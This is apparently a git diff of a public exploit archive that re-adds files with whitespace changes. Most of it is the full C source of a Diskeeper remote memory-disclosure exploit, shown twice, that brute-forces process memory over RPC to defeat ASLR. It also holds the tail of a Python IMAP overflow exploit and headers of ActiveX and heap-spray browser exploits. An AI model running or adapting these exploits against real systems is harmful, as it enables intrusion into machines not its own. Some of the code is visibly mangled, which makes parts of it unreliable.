+	s = Copulate(target,143)
+	pkt = "0001 LOGIN \""
+	pkt += u
+	pkt += "\" \""
+	pkt += p
+	pkt += "\"\r\n"
+	SendPacket(s,pkt)
+	pkt = "0003 SELECT \"Inbox\"\r\n"
+	SendPacket(s,pkt)
+	pkt = "C284 SEARCH "
+	pkt += "P"*1008
+	pkt += struct.pack('  ' % sys.argv[0]
+                sys.exit(-1)
+        Fascism(target,u,p)
+
+# milw0rm.com [2007-08-14]
diff --git a/platforms/windows/remote/4290.html b/platforms/windows/remote/4290.html
index c29f831c8..549d661b5 100755
--- a/platforms/windows/remote/4290.html
+++ b/platforms/windows/remote/4290.html
@@ -1,38 +1,38 @@
-
    ---------------------------------------------------------------------------------------------------------------
- 0-day EDraw Office Viewer Component 5.1 (officeviewer.ocx v. 5.1.199.1) "HttpDownloadFile()" Insecure Method
- url: http://www.ocxt.com/officeviewer.php
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not be responsible for any damage.
- 
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- all software that use this ocx are vulnerable to this exploits.
-
- This ActiveX is marked as:
- RegKey Safe for Script: True
- RegKey Safe for Init: True
- Implements IObjectSafety: True
- IDisp Safe: Safe for untrusted: caller, data
- IPStorage Safe: Safe for untrusted: caller,data
---------------------------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-08-16]
+
    +--------------------------------------------------------------------------------------------------------------
+ 0-day EDraw Office Viewer Component 5.1 (officeviewer.ocx v. 5.1.199.1) "HttpDownloadFile()" Insecure Method
+ url: http://www.ocxt.com/officeviewer.php
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not be responsible for any damage.
+ 
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx are vulnerable to this exploits.
+
+ This ActiveX is marked as:
+ RegKey Safe for Script: True
+ RegKey Safe for Init: True
+ Implements IObjectSafety: True
+ IDisp Safe: Safe for untrusted: caller, data
+ IPStorage Safe: Safe for untrusted: caller,data
+--------------------------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-08-16]
diff --git a/platforms/windows/remote/4292.cpp b/platforms/windows/remote/4292.cpp
index 5f6b46ace..ceb6d7f40 100755
--- a/platforms/windows/remote/4292.cpp
+++ b/platforms/windows/remote/4292.cpp
@@ -1,511 +1,511 @@
-/*
-Diskeeper Remote Memory Disclosure
-Credit: Pravus (pravus -a-t- hush -d-o-t- com)
-Greetz: Scientology for making a remotely accessible disk
-defragmenter.  Felix, Jenna, and Isaac.
-
-Vulnerability Description:
-This vulnerability involves a memory comparison function that is
-remotely, anonymously accessible via the remote procedure call in
-the Diskeeper administrative interface.  Using this, an attacker
-can guess / brute force memory at any address in the process;
-although passing a bad pointer will cause a memory read exception
-and DoS the process.  Since causing a Denial of Service for
-Diskeeper is of minimal consequence, this write-up will focus on
-the memory reading aspect.
-
-By making use of shared user memory at 0x7FFE0000, an attacker can
-learn information, such as Windows drive, path, and version.  More
-importantly for a targeted attack, an attacker can also get the
-name, path, version and base address of all loaded modules in the
-process. This would essentially defeat address space randomization
-(ASLR) in Windows Vista, since loaded modules tend to have the same
-preferred address in all processes for each boot of the system.
-
-Details:
-Diskeeper introduced their administrative interface in Diskeeper 9
-and continued it in Diskeeper 10 and Diskeeper 2007.  For the
-purpose of this vulnerability I tested in Diskeeper 9 Professional
-and Diskeeper 2007 Pro Premier.  (Though I believe from
-documentation that the Server Editions of each and both versions in
-Diskeeper 10 are equally vulnerable.)
-
-The administrative interface, DkService.exe, runs as a system
-service that is by default configured to automatically start.  It
-listens on TCP port 31038 and has three RPC functions available.
-Calling the opcode 0x01 RPC function (MIDL below) allows a remote,
-anonymous memory comparison at an attacker provided address.
-Simply pass the size of the data, the data, and the address to make
-use of this.
-
-MIDL
-/* opcode: 0x01, address: 0x004922F0 (address from 2007
-ProPremier)* /
-
-long  sub_4922F0 (
- [in] long arg_1,
- [in][size_is(arg_1)] char * arg_2,
- [in] hyper arg_3
-);
-
-
-Exploitation:
-In order to exploit this, one must bind to the RPC interface, then
-initiate the RPC call as many times as desired.   If guessing an
-intelligent value, such as a widecharacter string L"WINDOWS",
-providing multiple bytes of data is optimal for speed's sake.  If
-attempting to brute force an address, doing so one byte at a time
-is preferable so you are guessing at most 4n times instead of n^4.
-
-In my sample exploit, I am first getting general system information
-by looking at fixed locations in shared user data.  I get the
-Windows drive letter, the Windows directory, and the Windows OS
-version (5.1=XP; 6.0=Vista; etc.)  Then I brute force an address in
-NTDLL.DLL from the shared user data.  From this, I can jump
-backwards to the start of the module, looking for the MZ header.
-Knowing where the start of the module is, I can look for the .data
-header to find where the data section of NTDLL.DLL is loaded.
-
-This is where things get a little tricky.  Since the loaded module
-hash table is at different places in the data section depending on
-the version of NTDLL.DLL, we have to search for it.  Basically each
-hash bucket that is empty contains a pointer to itself, so I made a
-mask to place over memory that defined which buckets could be empty
-vs. not, and defined that the last 6 had to be empty, because they
-correspond to modules that don't start with an alphabetic character
-in name.  (This part could be made more effective and faster, but
-for a PoC, it should work.)  Once it finds memory that fits the
-mask, I iterate the linked list at each of the 32 hash buckets and
-read the relevant loaded module information.
-
-I just used a #define for the IP address string, so modify it for
-your target IP.
-
-Exploit Code:
-
-*/
-
-//Diskeeper Remote Memory Read
-//By: Pravus
-#define WIN32_LEAN_AND_MEAN
-#define PORT 31038
-#define DELAY 50
-#define _CRT_SECURE_NO_DEPRECATE
-#define _USE_32BIT_TIME_T
-#define servername "127.0.0.1"
-
-#pragma comment (lib,"ws2_32")
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-
-char rpcbind [] =
-"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00"
-"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
-"\xb7\xf9\x09\x28\xef\xcf\x64\x41\x8c\x46\xe8\xd4\x17\x52\x2c\x1c"
-"\x03\x00\x03\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
-"\x2b\x10\x48\x60\x02\x00\x00\x00";
-
-char request [] =
-"\x05\x00\x00\x03\x10\x00\x00\x00\x68\x00\x00\x00\x00\x00\x00\x00"
-"\x50\x00\x00\x00\x00\x00\x01\x00";
-//4 byte len
-//4 byte len
-//dword aligned string
-//pointer
-//ign dword
-
-
-//This function is a simple remote comparison returning true if the memory
-//at loc matches value for len bytes.  This is where the real "exploitation"
-//comes into play.  We just send a mocked up RPC request using their provided
-//remote mem compare function.
-BOOL rmemcmp(SOCKET conn, int loc, char* value, int len)
-{
-               char buff [32768];
-               int w,x=0;
-               memset(buff, '\0', sizeof(buff));
-               memcpy(buff, request, sizeof(request));
-               x+=sizeof(request)-1;
-
-               memcpy(buff+x, &len, sizeof(len));  //len
-               x+=sizeof(len);
-               memcpy(buff+x, &len, sizeof(len));  //len
-               x+=sizeof(len);
-               memcpy(buff+x, value, len); //string
-               x+=len;
-               x+=(8-(len%8))%8;  //null pad
-               memcpy(buff+x, &loc, sizeof(loc));  //pointer
-               x+=sizeof(loc);
-               w=0;
-               memcpy(buff+x, &w, sizeof(w));  //don't care
-               x+=sizeof(w);
-
-               w=x-0x18;
-               memcpy(buff+8, &x, sizeof(x));
-               memcpy(buff+0x10, &w, sizeof(w));
-
-               send(conn,(const char*)buff,x,0);
-               recv(conn,(char*)buff,2048,0);
-
-               w=*(buff+0x18);
-               return (BOOL)w;
-}
-
-//main function do all the calls
-int main(int argc, char** argv)
-{
-       WSADATA wsaData;
-       if (WSAStartup(0x202,&wsaData))
-               return 1;
-
-       SOCKET conn;
-       conn=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
-       if(conn==INVALID_SOCKET)
-           return 1;
-
-       unsigned long addr;
-       addr=inet_addr(servername);
-       if (addr==INADDR_NONE)
-       {
-               closesocket(conn);
-               return 1;
-       }
-
-       sockaddr_in server;
-       server.sin_addr.s_addr=addr;
-       server.sin_family=AF_INET;
-       server.sin_port=htons(PORT);
-       if(connect(conn,(struct sockaddr*)&server,sizeof(server)))
-       {
-               closesocket(conn);
-               return 1;
-       }
-
-       linger ling;
-       ling.l_onoff=1;
-       ling.l_linger=0;
-       char buff [32768];
-       char str [1024];
-       WCHAR wstr [1024];
-       unsigned char filechars [] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.\\";
-       unsigned int listbin, mask;
-       unsigned char c, *d;
-       int u,v,w,x,y,z,ret,ntbase,ntdata,modbase;
-       struct _timeb timebuffer;
-
-       timeval t;
-       t.tv_sec=0;
-       t.tv_usec=DELAY;
-
-       //send the rpc bind
-       send(conn,(const char*)rpcbind,sizeof(rpcbind)-1,0);
-       recv(conn,(char*)buff,2048,0);
-
-       //get the Windows drive letter
-       ret=0;
-       c='A';
-       y=1;
-       z=0x7FFE0030;
-       while ((ret==0) && (c<='Z'))
-       {
-               sprintf(str, "%c", c);
-               ret=rmemcmp(conn, z, str, y);
-
-               c++;
-       }
-
-       if (!ret)
-       {
-               printf("Could not determine drive letter.\n");
-       }
-       else
-       {
-               c--;
-               printf("Windows running on drive %c\n",c);
-       }
-
-       //get the Windows dir
-       z=0x7FFE0036;
-       wcscpy(wstr, L"WINDOWS");
-       y=wcslen(wstr)*2;
-       if (rmemcmp(conn, z, (char*)wstr, y))
-       {
-               printf("Windows directory is WINDOWS\n");
-       }
-       else
-       {
-               wcscpy(wstr, L"WINNT");
-               y=wcslen(wstr)*2;
-               if (rmemcmp(conn, z, (char*)wstr, y))
-               {
-                       printf("Windows directory is WINNT\n");
-               }
-               else
-               {
-                               ret=0;
-                               y=1;
-                               z=0x7FFE0036;
-                               printf("Windows directory is ");
-                               do {
-                                       d=filechars;
-                                       ret=0;
-                                       while ((ret==0) && (*d))
-                                       {
-                                               sprintf(str, "%c", *d);
-                                               ret=rmemcmp(conn, z, str, y);
-
-                                               d++;
-                                       }
-                                       if (ret)
-                                               printf(str);
-                                       z+=2;
-                               } while (ret==1);
-                               printf("\n");
-               }
-       }
-
-       //Windows version
-       printf("Windows version is ");
-
-       ret=0;
-       c='\x00';
-       y=1;
-       z=0x7FFE026C;
-       while (ret==0)
-       {
-               sprintf(str, "%c", c);
-               ret=rmemcmp(conn, z, str, y);
-
-               c++;
-       }
-       c--;
-       printf("%u.",c);
-
-       ret=0;
-       c='\x00';
-       y=1;
-       z+=4;
-       while (ret==0)
-       {
-               sprintf(str, "%c", c);
-               ret=rmemcmp(conn, z, str, y);
-
-               c++;
-       }
-       c--;
-       printf("%u\n",c);
-
-       //find the NTDLL.DLL base address
-       x=0;
-       y=1;
-       for (z=0x7FFE0303; z>=0x7FFE0300; z--)
-       {
-               ret=0;
-               c='\x00';
-               while (ret==0)
-               {
-                       sprintf(str, "%c", c);
-                       ret=rmemcmp(conn, z, str, y);
-
-                       c++;
-               }
-               c--;
-               x=x<<8;
-               x+=c;
-       } //      printf ("Beginning search for NTDLL.DLL at 0x%x\n",x);
-
-       z=x&0xFFFF0000;
-       strcpy(str, "MZ");
-       y=2;
-       ret=0;
-       while (ret==0)
-       {
-                       ret=rmemcmp(conn, z, str, y);
-                       z-=0x10000;
-       }
-       z+=0x10000;
-       ntbase=z;
-       printf ("NTDLL.DLL is based at 0x%x\n",z);
-
-       //Look for .data section and then the module hash table in NTDLL (LDR_MODULE)
-       z+=0x160;  //to skip over some of DOS header + PE header + .text section
-
-       strcpy(str, ".data");
-       y=5;
-       ret=0;
-       while (ret==0)
-       {
-                       ret=rmemcmp(conn, z, str, y);
-                       z+=4;
-       }
-       z+=8;  //start of .data + 0x0c
-       y=1;
-       x=0;
-       for (w=z+3; w>=z; w--)
-       {
-               ret=0;
-               c='\x00';
-               while (ret==0)
-               {
-                       sprintf(str, "%c", c);
-                       ret=rmemcmp(conn, w, str, y);
-
-                       c++;
-               }
-               c--;
-               x=x<<8;
-               x+=c;
-       }
-       z=ntdata=x+ntbase;
-       printf ("NTDLL data section located at 0x%x\n",z);
-
-       //mask - 0=can't be empty hash, 1=can be empty; 01001101 11010000 10000101 11111111
-       mask=0x4DD085FF;
-       listbin=0;
-       y=4;
-       do
-       {
-               ret=rmemcmp(conn, z, (char*)&z, y);
-               listbin=(listbin<<1)+ret;
-               ret=rmemcmp(conn, z+4, (char*)&z, y);
-               listbin=listbin&(~(!ret));
-
-               z+=8;
-       } while ((z>(31-((z-modbase)/8)))&1)==0)
-               {
-                       v=z;
-                       do {
-                               x=0;
-                               y=1;
-                               for (w=v+3; w>=v; w--)
-                               {
-                                       ret=0;
-                                       c='\x00';
-                                       while (ret==0)
-                                       {
-                                               sprintf(str, "%c", c);
-                                               ret=rmemcmp(conn, w, str, y);
-
-                                               c++;
-                                       }
-                                       c--;
-                                       x=x<<8;
-                                       x+=c;
-                               }
-
-                               if (x==z)  //if the next pointer points back to the module list, we're done
-                                       break;
-
-                               //get address of module name
-                               v=x-12;
-                               u=0;
-                               y=1;
-                               for (w=v+3; w>=v; w--)
-                               {
-                                       ret=0;
-                                       c='\x00';
-                                       while (ret==0)
-                                       {
-                                               sprintf(str, "%c", c);
-                                               ret=rmemcmp(conn, w, str, y);
-
-                                               c++;
-                                       }
-                                       c--;
-                                       u=u<<8;
-                                       u+=c;
-                               }
-
-                               //get the module name
-                               ret=0;
-                               y=1;
-                               printf("Module ");
-                               do {
-                                       d=filechars;
-                                       ret=0;
-                                       while ((ret==0) && (*d))
-                                       {
-                                               sprintf(str, "%c", *d);
-                                               ret=rmemcmp(conn, u, str, y);
-
-                                               d++;
-                                       }
-                                       if (ret)
-                                               printf(str);
-                                       u+=2;
-                               } while (ret==1);
-                               printf(" is loaded at ");
-
-                               //get the module address
-                               v=x-36;
-                               u=0;
-                               y=1;
-                               for (w=v+3; w>=v; w--)
-                               {
-                                       ret=0;
-                                       c='\x00';
-                                       while (ret==0)
-                                       {
-                                               sprintf(str, "%c", c);
-                                               ret=rmemcmp(conn, w, str, y);
-
-                                               c++;
-                                       }
-                                       c--;
-                                       u=u<<8;
-                                       u+=c;
-                               }
-                               printf("0x%x\n",u);
-
-                               //get the module timestamp
-                               v=x+8;
-                               u=0;
-                               y=1;
-                               for (w=v+3; w>=v; w--)
-                               {
-                                       ret=0;
-                                       c='\x00';
-                                       while (ret==0)
-                                       {
-                                               sprintf(str, "%c", c);
-                                               ret=rmemcmp(conn, w, str, y);
-
-                                               c++;
-                                       }
-                                       c--;
-                                       u=u<<8;
-                                       u+=c;
-                               }
-                               memset(str, '\0', sizeof(str));
-                               timebuffer.time=u;
-                               ctime_s(str, 26, &(timebuffer.time));
-                               printf("Module time is %.24s (0x%x)\n", str, u);
-
-                               v=x;
-                       } while (v!=z);
-               }
-       }
-
-       system("pause");
-
-       WSACleanup();
-       return 0;
-}
-
-// milw0rm.com [2007-08-17]
+/*
+Diskeeper Remote Memory Disclosure
+Credit: Pravus (pravus -a-t- hush -d-o-t- com)
+Greetz: Scientology for making a remotely accessible disk
+defragmenter.  Felix, Jenna, and Isaac.
+
+Vulnerability Description:
+This vulnerability involves a memory comparison function that is
+remotely, anonymously accessible via the remote procedure call in
+the Diskeeper administrative interface.  Using this, an attacker
+can guess / brute force memory at any address in the process;
+although passing a bad pointer will cause a memory read exception
+and DoS the process.  Since causing a Denial of Service for
+Diskeeper is of minimal consequence, this write-up will focus on
+the memory reading aspect.
+
+By making use of shared user memory at 0x7FFE0000, an attacker can
+learn information, such as Windows drive, path, and version.  More
+importantly for a targeted attack, an attacker can also get the
+name, path, version and base address of all loaded modules in the
+process. This would essentially defeat address space randomization
+(ASLR) in Windows Vista, since loaded modules tend to have the same
+preferred address in all processes for each boot of the system.
+
+Details:
+Diskeeper introduced their administrative interface in Diskeeper 9
+and continued it in Diskeeper 10 and Diskeeper 2007.  For the
+purpose of this vulnerability I tested in Diskeeper 9 Professional
+and Diskeeper 2007 Pro Premier.  (Though I believe from
+documentation that the Server Editions of each and both versions in
+Diskeeper 10 are equally vulnerable.)
+
+The administrative interface, DkService.exe, runs as a system
+service that is by default configured to automatically start.  It
+listens on TCP port 31038 and has three RPC functions available.
+Calling the opcode 0x01 RPC function (MIDL below) allows a remote,
+anonymous memory comparison at an attacker provided address.
+Simply pass the size of the data, the data, and the address to make
+use of this.
+
+MIDL
+/* opcode: 0x01, address: 0x004922F0 (address from 2007
+ProPremier)* /
+
+long  sub_4922F0 (
+ [in] long arg_1,
+ [in][size_is(arg_1)] char * arg_2,
+ [in] hyper arg_3
+);
+
+
+Exploitation:
+In order to exploit this, one must bind to the RPC interface, then
+initiate the RPC call as many times as desired.   If guessing an
+intelligent value, such as a widecharacter string L"WINDOWS",
+providing multiple bytes of data is optimal for speed's sake.  If
+attempting to brute force an address, doing so one byte at a time
+is preferable so you are guessing at most 4n times instead of n^4.
+
+In my sample exploit, I am first getting general system information
+by looking at fixed locations in shared user data.  I get the
+Windows drive letter, the Windows directory, and the Windows OS
+version (5.1=XP; 6.0=Vista; etc.)  Then I brute force an address in
+NTDLL.DLL from the shared user data.  From this, I can jump
+backwards to the start of the module, looking for the MZ header.
+Knowing where the start of the module is, I can look for the .data
+header to find where the data section of NTDLL.DLL is loaded.
+
+This is where things get a little tricky.  Since the loaded module
+hash table is at different places in the data section depending on
+the version of NTDLL.DLL, we have to search for it.  Basically each
+hash bucket that is empty contains a pointer to itself, so I made a
+mask to place over memory that defined which buckets could be empty
+vs. not, and defined that the last 6 had to be empty, because they
+correspond to modules that don't start with an alphabetic character
+in name.  (This part could be made more effective and faster, but
+for a PoC, it should work.)  Once it finds memory that fits the
+mask, I iterate the linked list at each of the 32 hash buckets and
+read the relevant loaded module information.
+
+I just used a #define for the IP address string, so modify it for
+your target IP.
+
+Exploit Code:
+
+*/
+
+//Diskeeper Remote Memory Read
+//By: Pravus
+#define WIN32_LEAN_AND_MEAN
+#define PORT 31038
+#define DELAY 50
+#define _CRT_SECURE_NO_DEPRECATE
+#define _USE_32BIT_TIME_T
+#define servername "127.0.0.1"
+
+#pragma comment (lib,"ws2_32")
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+char rpcbind [] =
+"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00"
+"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
+"\xb7\xf9\x09\x28\xef\xcf\x64\x41\x8c\x46\xe8\xd4\x17\x52\x2c\x1c"
+"\x03\x00\x03\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
+"\x2b\x10\x48\x60\x02\x00\x00\x00";
+
+char request [] =
+"\x05\x00\x00\x03\x10\x00\x00\x00\x68\x00\x00\x00\x00\x00\x00\x00"
+"\x50\x00\x00\x00\x00\x00\x01\x00";
+//4 byte len
+//4 byte len
+//dword aligned string
+//pointer
+//ign dword
+
+
+//This function is a simple remote comparison returning true if the memory
+//at loc matches value for len bytes.  This is where the real "exploitation"
+//comes into play.  We just send a mocked up RPC request using their provided
+//remote mem compare function.
+BOOL rmemcmp(SOCKET conn, int loc, char* value, int len)
+{
+               char buff [32768];
+               int w,x=0;
+               memset(buff, '\0', sizeof(buff));
+               memcpy(buff, request, sizeof(request));
+               x+=sizeof(request)-1;
+
+               memcpy(buff+x, &len, sizeof(len));  //len
+               x+=sizeof(len);
+               memcpy(buff+x, &len, sizeof(len));  //len
+               x+=sizeof(len);
+               memcpy(buff+x, value, len); //string
+               x+=len;
+               x+=(8-(len%8))%8;  //null pad
+               memcpy(buff+x, &loc, sizeof(loc));  //pointer
+               x+=sizeof(loc);
+               w=0;
+               memcpy(buff+x, &w, sizeof(w));  //don't care
+               x+=sizeof(w);
+
+               w=x-0x18;
+               memcpy(buff+8, &x, sizeof(x));
+               memcpy(buff+0x10, &w, sizeof(w));
+
+               send(conn,(const char*)buff,x,0);
+               recv(conn,(char*)buff,2048,0);
+
+               w=*(buff+0x18);
+               return (BOOL)w;
+}
+
+//main function do all the calls
+int main(int argc, char** argv)
+{
+       WSADATA wsaData;
+       if (WSAStartup(0x202,&wsaData))
+               return 1;
+
+       SOCKET conn;
+       conn=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+       if(conn==INVALID_SOCKET)
+           return 1;
+
+       unsigned long addr;
+       addr=inet_addr(servername);
+       if (addr==INADDR_NONE)
+       {
+               closesocket(conn);
+               return 1;
+       }
+
+       sockaddr_in server;
+       server.sin_addr.s_addr=addr;
+       server.sin_family=AF_INET;
+       server.sin_port=htons(PORT);
+       if(connect(conn,(struct sockaddr*)&server,sizeof(server)))
+       {
+               closesocket(conn);
+               return 1;
+       }
+
+       linger ling;
+       ling.l_onoff=1;
+       ling.l_linger=0;
+       char buff [32768];
+       char str [1024];
+       WCHAR wstr [1024];
+       unsigned char filechars [] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.\\";
+       unsigned int listbin, mask;
+       unsigned char c, *d;
+       int u,v,w,x,y,z,ret,ntbase,ntdata,modbase;
+       struct _timeb timebuffer;
+
+       timeval t;
+       t.tv_sec=0;
+       t.tv_usec=DELAY;
+
+       //send the rpc bind
+       send(conn,(const char*)rpcbind,sizeof(rpcbind)-1,0);
+       recv(conn,(char*)buff,2048,0);
+
+       //get the Windows drive letter
+       ret=0;
+       c='A';
+       y=1;
+       z=0x7FFE0030;
+       while ((ret==0) && (c<='Z'))
+       {
+               sprintf(str, "%c", c);
+               ret=rmemcmp(conn, z, str, y);
+
+               c++;
+       }
+
+       if (!ret)
+       {
+               printf("Could not determine drive letter.\n");
+       }
+       else
+       {
+               c--;
+               printf("Windows running on drive %c\n",c);
+       }
+
+       //get the Windows dir
+       z=0x7FFE0036;
+       wcscpy(wstr, L"WINDOWS");
+       y=wcslen(wstr)*2;
+       if (rmemcmp(conn, z, (char*)wstr, y))
+       {
+               printf("Windows directory is WINDOWS\n");
+       }
+       else
+       {
+               wcscpy(wstr, L"WINNT");
+               y=wcslen(wstr)*2;
+               if (rmemcmp(conn, z, (char*)wstr, y))
+               {
+                       printf("Windows directory is WINNT\n");
+               }
+               else
+               {
+                               ret=0;
+                               y=1;
+                               z=0x7FFE0036;
+                               printf("Windows directory is ");
+                               do {
+                                       d=filechars;
+                                       ret=0;
+                                       while ((ret==0) && (*d))
+                                       {
+                                               sprintf(str, "%c", *d);
+                                               ret=rmemcmp(conn, z, str, y);
+
+                                               d++;
+                                       }
+                                       if (ret)
+                                               printf(str);
+                                       z+=2;
+                               } while (ret==1);
+                               printf("\n");
+               }
+       }
+
+       //Windows version
+       printf("Windows version is ");
+
+       ret=0;
+       c='\x00';
+       y=1;
+       z=0x7FFE026C;
+       while (ret==0)
+       {
+               sprintf(str, "%c", c);
+               ret=rmemcmp(conn, z, str, y);
+
+               c++;
+       }
+       c--;
+       printf("%u.",c);
+
+       ret=0;
+       c='\x00';
+       y=1;
+       z+=4;
+       while (ret==0)
+       {
+               sprintf(str, "%c", c);
+               ret=rmemcmp(conn, z, str, y);
+
+               c++;
+       }
+       c--;
+       printf("%u\n",c);
+
+       //find the NTDLL.DLL base address
+       x=0;
+       y=1;
+       for (z=0x7FFE0303; z>=0x7FFE0300; z--)
+       {
+               ret=0;
+               c='\x00';
+               while (ret==0)
+               {
+                       sprintf(str, "%c", c);
+                       ret=rmemcmp(conn, z, str, y);
+
+                       c++;
+               }
+               c--;
+               x=x<<8;
+               x+=c;
+       } //      printf ("Beginning search for NTDLL.DLL at 0x%x\n",x);
+
+       z=x&0xFFFF0000;
+       strcpy(str, "MZ");
+       y=2;
+       ret=0;
+       while (ret==0)
+       {
+                       ret=rmemcmp(conn, z, str, y);
+                       z-=0x10000;
+       }
+       z+=0x10000;
+       ntbase=z;
+       printf ("NTDLL.DLL is based at 0x%x\n",z);
+
+       //Look for .data section and then the module hash table in NTDLL (LDR_MODULE)
+       z+=0x160;  //to skip over some of DOS header + PE header + .text section
+
+       strcpy(str, ".data");
+       y=5;
+       ret=0;
+       while (ret==0)
+       {
+                       ret=rmemcmp(conn, z, str, y);
+                       z+=4;
+       }
+       z+=8;  //start of .data + 0x0c
+       y=1;
+       x=0;
+       for (w=z+3; w>=z; w--)
+       {
+               ret=0;
+               c='\x00';
+               while (ret==0)
+               {
+                       sprintf(str, "%c", c);
+                       ret=rmemcmp(conn, w, str, y);
+
+                       c++;
+               }
+               c--;
+               x=x<<8;
+               x+=c;
+       }
+       z=ntdata=x+ntbase;
+       printf ("NTDLL data section located at 0x%x\n",z);
+
+       //mask - 0=can't be empty hash, 1=can be empty; 01001101 11010000 10000101 11111111
+       mask=0x4DD085FF;
+       listbin=0;
+       y=4;
+       do
+       {
+               ret=rmemcmp(conn, z, (char*)&z, y);
+               listbin=(listbin<<1)+ret;
+               ret=rmemcmp(conn, z+4, (char*)&z, y);
+               listbin=listbin&(~(!ret));
+
+               z+=8;
+       } while ((z>(31-((z-modbase)/8)))&1)==0)
+               {
+                       v=z;
+                       do {
+                               x=0;
+                               y=1;
+                               for (w=v+3; w>=v; w--)
+                               {
+                                       ret=0;
+                                       c='\x00';
+                                       while (ret==0)
+                                       {
+                                               sprintf(str, "%c", c);
+                                               ret=rmemcmp(conn, w, str, y);
+
+                                               c++;
+                                       }
+                                       c--;
+                                       x=x<<8;
+                                       x+=c;
+                               }
+
+                               if (x==z)  //if the next pointer points back to the module list, we're done
+                                       break;
+
+                               //get address of module name
+                               v=x-12;
+                               u=0;
+                               y=1;
+                               for (w=v+3; w>=v; w--)
+                               {
+                                       ret=0;
+                                       c='\x00';
+                                       while (ret==0)
+                                       {
+                                               sprintf(str, "%c", c);
+                                               ret=rmemcmp(conn, w, str, y);
+
+                                               c++;
+                                       }
+                                       c--;
+                                       u=u<<8;
+                                       u+=c;
+                               }
+
+                               //get the module name
+                               ret=0;
+                               y=1;
+                               printf("Module ");
+                               do {
+                                       d=filechars;
+                                       ret=0;
+                                       while ((ret==0) && (*d))
+                                       {
+                                               sprintf(str, "%c", *d);
+                                               ret=rmemcmp(conn, u, str, y);
+
+                                               d++;
+                                       }
+                                       if (ret)
+                                               printf(str);
+                                       u+=2;
+                               } while (ret==1);
+                               printf(" is loaded at ");
+
+                               //get the module address
+                               v=x-36;
+                               u=0;
+                               y=1;
+                               for (w=v+3; w>=v; w--)
+                               {
+                                       ret=0;
+                                       c='\x00';
+                                       while (ret==0)
+                                       {
+                                               sprintf(str, "%c", c);
+                                               ret=rmemcmp(conn, w, str, y);
+
+                                               c++;
+                                       }
+                                       c--;
+                                       u=u<<8;
+                                       u+=c;
+                               }
+                               printf("0x%x\n",u);
+
+                               //get the module timestamp
+                               v=x+8;
+                               u=0;
+                               y=1;
+                               for (w=v+3; w>=v; w--)
+                               {
+                                       ret=0;
+                                       c='\x00';
+                                       while (ret==0)
+                                       {
+                                               sprintf(str, "%c", c);
+                                               ret=rmemcmp(conn, w, str, y);
+
+                                               c++;
+                                       }
+                                       c--;
+                                       u=u<<8;
+                                       u+=c;
+                               }
+                               memset(str, '\0', sizeof(str));
+                               timebuffer.time=u;
+                               ctime_s(str, 26, &(timebuffer.time));
+                               printf("Module time is %.24s (0x%x)\n", str, u);
+
+                               v=x;
+                       } while (v!=z);
+               }
+       }
+
+       system("pause");
+
+       WSACleanup();
+       return 0;
+}
+
+// milw0rm.com [2007-08-17]
diff --git a/platforms/windows/remote/431.c b/platforms/windows/remote/431.c
index b26801d32..53bd2f61c 100755
--- a/platforms/windows/remote/431.c
+++ b/platforms/windows/remote/431.c
@@ -389,6 +389,6 @@ ways.\n\n");
 unsigned char xor_data(unsigned char byte)
 {
 	return(byte ^ 0x92);
-}
-
-// milw0rm.com [2004-09-02]
+}
+
+// milw0rm.com [2004-09-02]
diff --git a/platforms/windows/remote/4328.html b/platforms/windows/remote/4328.html
index cd6753e95..853601645 100755
--- a/platforms/windows/remote/4328.html
+++ b/platforms/windows/remote/4328.html
@@ -1,102 +1,102 @@
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-08-28]
+ that functions are safely scriptable and exploitable by HeapSpray Technique
-
-Tested : Windows XP Professional SP2 all patched,Internet Explorer 7
-
-That functions within this class can only be called if the control believes it is being run from the yahoo.com domain. -> I used "Simple DNS Plus" for manipulating the DNS resolution.
-
-I saved this file (exploit.htm) into directory root (web server) 
-and I exploited with link : http://www.yahoo.com/exploit.htm
-
-coder : minhbq
- mail : minhbq1985@gmail.com
--->
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-09-01]
+
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2007-09-01]
diff --git a/platforms/windows/remote/4357.html b/platforms/windows/remote/4357.html
index 2143953a0..d9c250520 100755
--- a/platforms/windows/remote/4357.html
+++ b/platforms/windows/remote/4357.html
@@ -1,34 +1,34 @@
-
-
-
-
-
-
-# milw0rm.com [2007-09-03]
+
+
+
+
+
+
+# milw0rm.com [2007-09-03]
diff --git a/platforms/windows/remote/4366.html b/platforms/windows/remote/4366.html
index e82207f56..e27629aa7 100755
--- a/platforms/windows/remote/4366.html
+++ b/platforms/windows/remote/4366.html
@@ -1,52 +1,52 @@
-
-
-
-
-
-
-
-# milw0rm.com [2007-09-05]
+
+
+
+
+
+
+
+# milw0rm.com [2007-09-05]
diff --git a/platforms/windows/remote/4372.html b/platforms/windows/remote/4372.html
index e7d166a85..892aa3408 100755
--- a/platforms/windows/remote/4372.html
+++ b/platforms/windows/remote/4372.html
